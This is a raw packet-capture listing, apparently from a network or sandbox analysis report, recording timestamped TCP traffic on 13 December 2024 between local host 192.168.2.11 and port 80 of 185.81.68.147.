                                                                                                                                                                                                Dec 13, 2024 08:18:50.302704096 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.303724051 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.303807974 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.303901911 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.305578947 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.305597067 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.305722952 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.306466103 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.306483030 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.306617022 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.307990074 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.308006048 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.308118105 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.308810949 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.308933973 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.309024096 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.310637951 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.310653925 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.310758114 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.311291933 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.311634064 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.311681032 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.312834978 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.312849998 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.312907934 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.314105988 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.314122915 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.314186096 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.315172911 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.315290928 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.315335035 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.316720963 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.316737890 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.316787004 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.317990065 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.318006039 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.318048000 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.318938017 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.319041014 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.319077015 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.320600033 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.320617914 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.320676088 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.321635962 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.321654081 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.321705103 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.322827101 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.323014021 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.323065996 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.324054956 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.324167013 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.324213982 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.325282097 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.325393915 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.325437069 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.326529026 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.326628923 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.326762915 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.327996969 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.328012943 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.328062057 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.329449892 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.329463959 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.329504967 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.330514908 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.330529928 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.330579042 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.331677914 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.331756115 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.331795931 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.333050013 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.333064079 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.333156109 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.334762096 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.334777117 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.334832907 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.335506916 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.335572958 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.335609913 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.337328911 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.337383032 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.337418079 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.339379072 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.339394093 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.339428902 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.339438915 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.340256929 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.340316057 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.340792894 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.340807915 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.340856075 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.342828989 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.342844009 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.342891932 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.343372107 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.343385935 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.343530893 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.344538927 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.344553947 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.344604969 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.345583916 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.345676899 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.345752001 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.346857071 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.347390890 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.347440004 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.348241091 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.348253965 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.348320007 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.349666119 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.349682093 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.349829912 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.350722075 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.350758076 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.350804090 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.351949930 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.352008104 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.352060080 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.353975058 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.353991032 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.354166985 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.355375051 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.355389118 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.356132030 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.356170893 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.356187105 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.356241941 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.357105970 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.357134104 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.357173920 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.358320951 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.358371019 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.358479977 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.359833956 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.359850883 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.359899044 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.361140013 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.361155987 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.361193895 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.362689018 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.362706900 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.362776995 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.363362074 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.363711119 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.363751888 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.364770889 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.418184996 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.489703894 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.489749908 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.489976883 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.490092039 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.490300894 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.490391016 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.491300106 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.491414070 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.491475105 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.492492914 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.492587090 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.492638111 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.493696928 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.493830919 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.493944883 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.494915009 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.494956017 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.494998932 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.496100903 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.496205091 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.496260881 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.497318983 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.497442007 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.497486115 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.498527050 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.498625040 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.498784065 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.499735117 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.499834061 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.499878883 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.500917912 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.500937939 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.500996113 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.502125025 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.502226114 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.502273083 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.503339052 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.503406048 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.503499031 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.504568100 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.504661083 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.504697084 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.505765915 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.505872965 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.505917072 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.506934881 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.506990910 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.507056952 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.508143902 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.508240938 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.508371115 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.509361029 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.509484053 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.509521961 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.510703087 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.510819912 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.510864973 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.511817932 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.511881113 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.512128115 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.512994051 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.513081074 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.513124943 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.514178991 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.514281034 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.514328957 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.515410900 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.515501976 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.515578985 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.516624928 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.516720057 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.516824961 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.517796993 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.517904043 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.517941952 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.518970966 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.519088984 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.519165993 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.520220995 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.520252943 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.520294905 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.521409988 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.521497011 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.521595001 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.522602081 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.522710085 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.522747993 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.523832083 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.523912907 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.523962021 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.525022030 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.525171995 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.525213957 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.526211023 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.526303053 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.526411057 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.527425051 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.527486086 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.527575016 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.528608084 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.528703928 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.528747082 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.529828072 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.529927969 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.529966116 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.531028986 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.531131983 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.531250954 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.532244921 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.532366991 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.532408953 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.533449888 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.533601046 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.533639908 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.534663916 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.534748077 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.534857988 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.535850048 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.535958052 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.536058903 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.537066936 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.537113905 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.537221909 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.538276911 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.538455963 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.538609982 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.539504051 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.539594889 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.539709091 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.540653944 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.540785074 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.540879011 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.541868925 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.541960001 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.542120934 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.543087006 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.543190956 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.543262959 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.544253111 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.544358969 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.544401884 CET4972680192.168.2.11185.81.68.147
